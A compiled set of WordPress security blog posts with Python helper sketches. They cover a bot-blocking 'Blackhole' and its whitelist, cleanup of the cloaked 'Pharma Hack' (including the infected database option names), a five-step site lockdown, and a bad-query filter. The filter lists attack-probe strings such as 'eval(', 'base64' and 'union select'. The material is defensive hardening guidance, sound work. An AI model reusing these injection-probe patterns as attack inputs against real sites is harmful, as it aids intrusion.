Blocking bots is serious business. Good bots obey robots.txt rules, but there may be potentially useful bots that do not. Yahoo is the perfect example: it’s a valid search engine that sends some traffic, but sadly the Yahoo Slurp bot is too stupid to follow the rules. Since setting up the Blackhole several years ago, I’ve seen Slurp disobey robots rules hundreds of times. Bottom line: the Blackhole will block any bot that disobeys the robots.txt directives. Proceed accordingly. Update: By default, the Blackhole no longer blocks any of the popular search engines. See the next section for more information.

Whitelisting Search Bots

Initially, the Blackhole blocked any bot that disobeyed the robots.txt directives. Unfortunately, as discussed in the comments, Googlebot, Yahoo, and other major search bots do not always obey robots rules. And while blocking Yahoo! Slurp is debatable, blocking Google, MSN/Bing, et al. would just be dumb. Thus, the Blackhole now “whitelists” any user agent identifying as any of the following:

  • googlebot (Google)
  • msnbot (MSN/Bing)
  • yandex (Yandex)
  • teoma (Ask)
  • slurp (Yahoo)
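A minimal sketch of such a whitelist in Python, assuming a case-insensitive substring match on the User-Agent header (the Blackhole's own PHP may match differently; `is_whitelisted` is a hypothetical name). Because it only reads a header the client controls, it also accepts impostors:

```python
# User-agent substrings from the whitelist above.
WHITELIST = ("googlebot", "msnbot", "yandex", "teoma", "slurp")


def is_whitelisted(user_agent: str) -> bool:
    """Return True if the User-Agent *claims* to be a whitelisted search bot.

    Matching is an assumed case-insensitive substring test.
    """
    ua = user_agent.lower()
    return any(token in ua for token in WHITELIST)


print(is_whitelisted("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"))  # True
print(is_whitelisted("hey look, I'm teh Googlebot!"))  # True: a spoofed string passes too
print(is_whitelisted("EvilScraper/1.0"))  # False
```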

Whitelisting these user agents ensures that anything claiming to be a major search engine is allowed open access. The downside is that user-agent strings are easily spoofed, so a bad bot could crawl along and say, “hey look, I’m teh Googlebot!” and the whitelist would grant access. It is possible to verify the true identity of each bot, but as X3M explains in the comments, doing so consumes significant resources and could overload the server. To avoid that scenario, the Blackhole errs on the side of caution: it’s better to allow a few spoofs than to block any of the major search engines.
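The identity check mentioned above is usually done with forward-confirmed reverse DNS, the method Google documents for verifying Googlebot: look up the hostname for the requesting IP, check that it falls under the search engine's domain (for Googlebot, googlebot.com or google.com), then resolve that hostname and confirm it maps back to the same IP. The Python sketch below is illustrative; `verify_crawler` is hypothetical, the resolvers are injectable so it can be tested offline, and `gethostbyname_ex` only returns IPv4 addresses. Each check costs two DNS round trips, which is the overhead that makes verifying every request expensive without caching.

```python
import socket
from typing import Callable

# The leading dots stop look-alike domains such as "evilgooglebot.com" from matching.
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def verify_crawler(
    ip: str,
    allowed_suffixes: tuple = GOOGLE_SUFFIXES,
    reverse: Callable[[str], tuple] = socket.gethostbyaddr,
    forward: Callable[[str], tuple] = socket.gethostbyname_ex,
) -> bool:
    """Forward-confirmed reverse DNS check for a claimed search-engine bot."""
    try:
        hostname = reverse(ip)[0]  # gethostbyaddr -> (hostname, aliases, addresses)
    except OSError:  # socket.herror and socket.gaierror subclass OSError
        return False
    hostname = hostname.lower().rstrip(".")
    # 1. The reverse (PTR) name must sit inside the search engine's domain.
    if not hostname.endswith(allowed_suffixes):
        return False
    try:
        addresses = forward(hostname)[2]  # gethostbyname_ex -> (name, aliases, IPv4 list)
    except OSError:
        return False
    # 2. That name must resolve back to the same IP, otherwise the PTR record is forged.
    return ip in addresses
```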

License and Disclaimer

The Perishable Press Blackhole is released under the GNU General Public License. Check the Creative Commons for a summary and/or see the Blackhole source code for additional information. Also note that by downloading the Blackhole, you agree to accept full responsibility for its use. In no way shall the author be held accountable for anything that happens after the file has been downloaded.

Blackhole Download

Here you can download the current version of the Blackhole:

Perishable Press Blackhole for Bad Bots
    [ version 1.2 | .zip format | 5K | 251 downloads ]

Source: Perishable Press

WordPress Security Lockdown

This article is split into two parts for ez reference. First some information on the evil WordPress “Pharma Hack”, and then a recipe for protecting your site with a solid security lockdown. Choose your own adventure:

Pharmaceutical Apocalypse

A few weeks ago, DigWP.com was hit with the so-called Pharma Hack. We discovered the hack after some Google results turned up all sorts of spammy pharmaceutical garbage littered throughout posts, links, and titles. The tricky part about the hack is that it injects the spam garbage only when your site’s pages are requested by a search bot (e.g., googlebot). So when you view your pages in a browser, everything seems perfectly normal. Put simply, the hack is cloaked. We had no idea anything was wrong until about two weeks after the attack. During that time a majority of our search engine results were nuked with evil pharma spam. Ick.

Flash forward three weeks and things are locked down tight. The Pharma Hack has not returned, and most of the spam garbage in the search results has been filtered out and replaced with clean pages. At the time of the attack, DigWP was running WordPress 2.9/3.0 without any sort of additional site security. We were just using whatever “default” protection was available from either WordPress or Media Temple. After detecting the hack, we spent several days cleaning it up and locking things down. At first, it seemed like an impossible hack to fix – nothing seemed to work. We ran through the following routine, hoping to fix it:

  • Locate and remove hacked 404.php file
  • Locate and remove hacked content from database
  • Replace entire set of salt keys
  • Upload new WordPress files
  • Restore previous versions of other files
  • Restore database to previous version

These actions alleviate the symptoms, but they don’t even touch the actual virus, which somehow regenerates the (base64) encoded spam script. As far as we know, the Pharma Hack works like this:

  1. Evil script gains access to your WordPress site
  2. Encoded spam script injected into database
  3. Script inserts spam garbage into pages requested by search bots
  4. Script makes no changes to pages requested by browsers

Within the database, the spam script is generated in any/all of these option_name fields:

  • class_generic_support
  • widget_generic_support
  • wp_check_hash
  • ftp_credentials
  • rss_[string], e.g., rss_7988287cd8f4f531c6b94fbdbc4e1caf
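Given the options rows (for example from `SELECT option_name, option_value FROM wp_options`, adjusted for your table prefix), a rough Python filter for the fields above might look like this. Some of these names can also hold legitimate data (WordPress itself stores upgrade settings in an `ftp_credentials` option), so the sketch flags a row only when its value is also a long run of base64-style characters. The 1,000-character cut-off and the helper name `suspicious_options` are assumptions; review anything flagged before deleting it.

```python
import re

# option_name values listed above.
SUSPECT_NAMES = {"class_generic_support", "widget_generic_support", "wp_check_hash", "ftp_credentials"}
RSS_NAME = re.compile(r"rss_[0-9a-f]{32}")       # e.g. rss_7988287cd8f4f531c6b94fbdbc4e1caf
BASE64_CHARS = re.compile(r"[A-Za-z0-9+/=\s]+")  # base64 alphabet plus whitespace only
MIN_LENGTH = 1000                                # assumed cut-off for "super-long"


def suspicious_options(rows):
    """Return option names that match a known Pharma Hack field AND hold a
    long value made only of base64-style characters.

    `rows` is an iterable of (option_name, option_value) pairs.
    """
    flagged = []
    for name, value in rows:
        if name in SUSPECT_NAMES or RSS_NAME.fullmatch(name):
            if len(value) >= MIN_LENGTH and BASE64_CHARS.fullmatch(value):
                flagged.append(name)
    return flagged
```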

If these fields are present and contain super-long strings of encoded gibberish, your site’s infected. You can assess the damage by examining the search results for your site (note: other spam keywords may be used):

site:digwp.com cipro OR meridia OR cialis

If you’re hit, hopefully you catch it before googlebot crawls along. But even if you have thousands of hacked pages appearing in the search index, it’s not too late to clean things up and secure your site. Here is how we did it.

WordPress Security Lockdown

This security strategy is best implemented on new sites. It just makes everything (like renaming table prefixes) so much easier. Either way, you want to start with a clean batch of files. Upload a fresh copy of WordPress, update your plugins, theme files, and so on. You may want to redirect visitors to a maintenance page while you work on your site. That said, here is our five-step Security Lockdown for WordPress:

  1. File Permissions
  2. File Protection
  3. Database Protection
  4. Essential Plugins
  5. Important Details

[1] File Permissions

After uploading fresh files, the next step is to ensure proper file permissions. The recommended WordPress settings are 644 for files and 755 for folders. Make sure these are set properly. While cleaning up, we noticed some crazy permission settings for sensitive files. For example, wp-config.php was set to 777: readable, writable, and executable by the entire world! Make sure you don’t see anything like that, and if you do, fix it.
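To find stray settings like that across a whole install, a short Python walk over the WordPress directory can flag anything that grants more access than those defaults, calling out world-writable entries explicitly. This is a sketch (`check_mode` and `audit_permissions` are hypothetical names) meant to be run on the server as a user that can read the files; stricter modes are not reported.

```python
import os
import stat
from typing import Iterator, Optional, Tuple

FILE_MODE, DIR_MODE = 0o644, 0o755  # the WordPress defaults described above


def check_mode(mode: int, is_dir: bool) -> Optional[str]:
    """Describe what is wrong with a permission mode, or return None if it is fine."""
    perms = stat.S_IMODE(mode)
    expected = DIR_MODE if is_dir else FILE_MODE
    if perms & stat.S_IWOTH:
        return f"world-writable ({perms:o})"
    if perms & ~expected:
        return f"more permissive than {expected:o} ({perms:o})"
    return None  # same as, or stricter than, the default


def audit_permissions(root: str) -> Iterator[Tuple[str, str]]:
    """Walk a WordPress directory and yield (path, problem) pairs."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful here
            problem = check_mode(st.st_mode, stat.S_ISDIR(st.st_mode))
            if problem:
                yield path, problem


# for path, problem in audit_permissions("/path/to/wordpress"):
#     print(path, problem)
```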

[2] File Protection

In addition to setting proper file permissions, we can also lock down key files with .htaccess. There are numerous files to protect, perhaps most importantly the wp-config.php file, which contains your database login information. Place the following code in your site’s root .htaccess file to protect it:

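# SECURE WP-CONFIG.PHP (Apache 2.4 and 2.2 syntax)
<Files wp-config.php>
 <IfModule mod_authz_core.c>
  Require all denied
 </IfModule>
 <IfModule !mod_authz_core.c>
  Order Deny,Allow
  Deny from all
 </IfModule>
</Files>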

You may also want to password-protect your wp-admin directory, but it may cause more trouble than it’s worth.

[3] Database Protection

Changing the default table prefix is one of the best ways to protect your database. Malicious scripts need targets, and default targets are easy to hit. Change wp_ to something more like a password. Some random string like “crUQZPadESeKSy8Q_” will make your tables difficult to hit. Like having a built-in password for your database :)

There are two ways to change your prefixes: the easy way and the hard way. The easy way is to set the $table_prefix line in your wp-config.php file as follows before installing WordPress (important: change the random string to something unique):

$table_prefix  = 'crUQZPadESeKSy8Q_'; // custom table prefix

Do that before running the install script and WordPress takes care of the prefix naming automagically when it creates the database. Going forward, there is no reason not to change default prefixes for all future WordPress installs. For existing sites, you can do it the hard way using a plugin or doing it manually.
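Any random string will do for the prefix. One option is Python's `secrets` module, sketched below; `random_table_prefix` is a hypothetical helper. WordPress accepts only letters, digits, and underscores in `$table_prefix`, so the sketch draws from that alphabet, and the 16-character length simply mirrors the example above.

```python
import secrets
import string

# WordPress only accepts letters, digits, and underscores in $table_prefix.
ALPHABET = string.ascii_letters + string.digits


def random_table_prefix(length: int = 16) -> str:
    """Return a random prefix like 'crUQZPadESeKSy8Q_' (random part plus underscore)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length)) + "_"


if __name__ == "__main__":
    # Print a ready-to-paste wp-config.php line.
    print(f"$table_prefix  = '{random_table_prefix()}'; // custom table prefix")
```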

[4] Essential Plugins

After exploring the vast crop of WordPress security plugins, these are the ones we found essential:

WP File Monitor

This plugin tracks changes made to your files. If/when anything changes, it notifies you via Admin Dashboard alert and/or email alert. So anytime a file is changed, moved, added, or removed, WP File Monitor lets you know. Here is a list of features:

  • Monitors file system for added/deleted/changed files
  • Sends email when a change is detected
  • Multiple email formats for alerts
  • Administration area alert to notify you of changes in case email is not received
  • Ability to monitor files for changes based on file hash or timestamp
  • Ability to exclude directories from scan
  • Site URL included in notification email in case plugin is in use on multiple sites

This is one of my favorite plugins. It’s perfect for keeping an eye on things. If anyone gets in and messes around with your files, you’ll know about it immediately, and even better, you’ll know exactly which files have been affected.
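The hash-based approach can be illustrated in a few lines of Python: store a SHA-256 digest per file, then diff two snapshots to find added, removed, and changed files. This shows the general technique only, not WP File Monitor's code; `snapshot` and `compare` are hypothetical names, and in practice you would save the first snapshot (for example as JSON) and compare against it on a schedule.

```python
import hashlib
import os


def snapshot(root: str) -> dict:
    """Map each file path (relative to root) to the SHA-256 of its contents."""
    hashes = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                # Read in chunks so large files do not load into memory at once.
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            hashes[os.path.relpath(path, root)] = digest.hexdigest()
    return hashes


def compare(old: dict, new: dict) -> dict:
    """Report files added, removed, or changed between two snapshots."""
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "changed": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }
```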

WP Security Scan

This plugin scans your WordPress installation for security vulnerabilities and suggests corrective actions. The scan report informs you of any problems with file permissions, system variables, and much more:

  • Passwords
  • File permissions
  • Database security
  • Version hiding
  • WordPress admin protection/security
  • Removes WP Generator META tag from core code

WP Security Scan also provides a nice summary of server information and latest scan information. Performing a new scan is immediate with the click of a button. Very easy.
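To confirm that the version is no longer advertised in a page, you can look for a `<meta name="generator">` tag in its HTML. A sketch using Python's standard-library `html.parser` follows; `find_generator` is a hypothetical helper. WordPress can expose its version in other places too (feeds, for example), so a clean result here is not a complete check.

```python
from html.parser import HTMLParser
from typing import Optional


class _GeneratorFinder(HTMLParser):
    """Collect the content of the first <meta name="generator"> tag."""

    def __init__(self):
        super().__init__()
        self.generator = None

    def handle_starttag(self, tag, attrs):
        # Also called for self-closing tags such as <meta ... />.
        if tag == "meta" and self.generator is None:
            attributes = dict(attrs)
            if (attributes.get("name") or "").lower() == "generator":
                self.generator = attributes.get("content")


def find_generator(html: str) -> Optional[str]:
    """Return the generator string (e.g. 'WordPress 3.0.1') or None if absent."""
    finder = _GeneratorFinder()
    finder.feed(html)
    finder.close()
    return finder.generator
```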

Ultimate Security Check

This plugin provides even more security information, helping you to identify potential issues with your WordPress installation. It scans your site for “hundreds of known threats,” and then “grades” your level of site security. Here are some of the key things it checks:

  • Checks for updates
  • Checks configuration file
  • Checks if config file is located in unsecured place
  • Checks presence of install script
  • Checks server configuration
  • Checks database
  • Checks code

And quite a bit more. The best part about Ultimate Security Check is that it’s so easy to use.

Secure WordPress

This plugin takes care of all those “little” things. Instead of installing a bunch of smaller plugins or custom functions for this stuff, the Secure WordPress plugin does it all for you:

  1. Removes error information from the login page
  2. Adds a virtual index.php to the plugin directory
  3. Removes the WordPress version, except in the admin area
  4. Removes the Really Simple Discovery link
  5. Removes the Windows Live Writer link
  6. Removes core update information for non-admins
  7. Removes plugin update information for non-admins
  8. Removes theme update information for non-admins (WP 2.8 and higher only)
  9. Hides the WordPress version in the backend dashboard for non-admins
  10. Blocks bad queries

Having all of this (and much more) done with a few clicks in the WordPress Admin is easy and effective.
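The "Block Bad Queries" item refers to rejecting requests whose URLs look like attack probes. A simplified Python sketch of that idea follows; the 255-character limit and the pattern list are assumptions chosen for illustration, not the plugin's exact rules, and `is_bad_query` is a hypothetical name.

```python
from urllib.parse import unquote

MAX_URI_LENGTH = 255  # assumed limit on the raw request URI
# Assumed probe patterns, compared in lowercase.
BAD_PATTERNS = ("eval(", "base64", "concat", "union+select", "union select")


def is_bad_query(request_uri: str) -> bool:
    """Return True if a request URI looks like an attack probe."""
    if len(request_uri) > MAX_URI_LENGTH:
        return True
    # Decode %-escapes so 'eval%28' is caught as 'eval(', then ignore case.
    decoded = unquote(request_uri).lower()
    return any(pattern in decoded for pattern in BAD_PATTERNS)
```

Simple substring rules can misfire (a post slug containing "concat" would be blocked here), so any such list needs tuning for the site it protects.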

[5] Important Details

The previous four steps comprise the majority of our security lockdown, but there are some important details to consider:

  • Keep your WordPress install, plugins, themes, and scripts updated with current versions
  • Use strong passwords and change them often
  • Disable user registration if not needed/used for your site
  • Check roles and permissions for all users
  • Clean up and consolidate old/loose files
  • Remove unused plugins and themes
  • Check permissions of upload, upgrade, and backup directories
  • Keep a backup of your site files
  • Keep your database optimized and backed up

We did these things here at DigWP.com, but certain tips may not apply to every site. As a side note, despite our new security lockdown, I am still concerned/confused about how to handle the upload, upgrade, and backup directories. It seems dangerous to leave these folders set with 777 permissions, and for many shared hosts, that seems to be the required setting. I would be interested in hearing any ideas about securing these directories.

Bottom Line

There is no such thing as perfect security. If someone wants in bad enough, they’re going to find a way, despite your best efforts at staying secure. Fortunately, most malicious scripts target the lowest common denominator: default WordPress installs. At the very least, ensure proper file permissions, secure wp-config.php, and use unique database prefixes. Together, these three steps will put your site out of reach for a vast majority of malicious scripts and other automated attacks. Of course, there are many other ways to strengthen your site’s security, depending on how far you want to go with it. The lockdown strategy presented in this article provides strong security in the most efficient way possible, but there is always room for improvement, so share your ideas and help the community secure their WordPress.

© 2010 Digging into WordPress | 43 comments | Categorized: Security

WPAlchemy MetaBox PHP Class

This looks awesome: “The WPAlchemy MetaBox PHP Class can be used to create WordPress meta boxes quickly. It will give you the flexibility you need as a developer, allowing you to quickly build custom meta boxes for your themes and plugins.”

© 2010 Digging into WordPress | Categorized: Links

(Meta) Conversation on Frameworks

Last week’s discussion-starter post about WordPress theme frameworks worked nicely. I really enjoyed the comment thread that followed, so I thought I’d point it out again for people who may have missed it or didn’t see it fully develop. Specific thanks to Justin Tadlock and Nathan Rice for sharing their thoughts as authors of popular frameworks.

© 2010 Digging into WordPress | Categorized: Links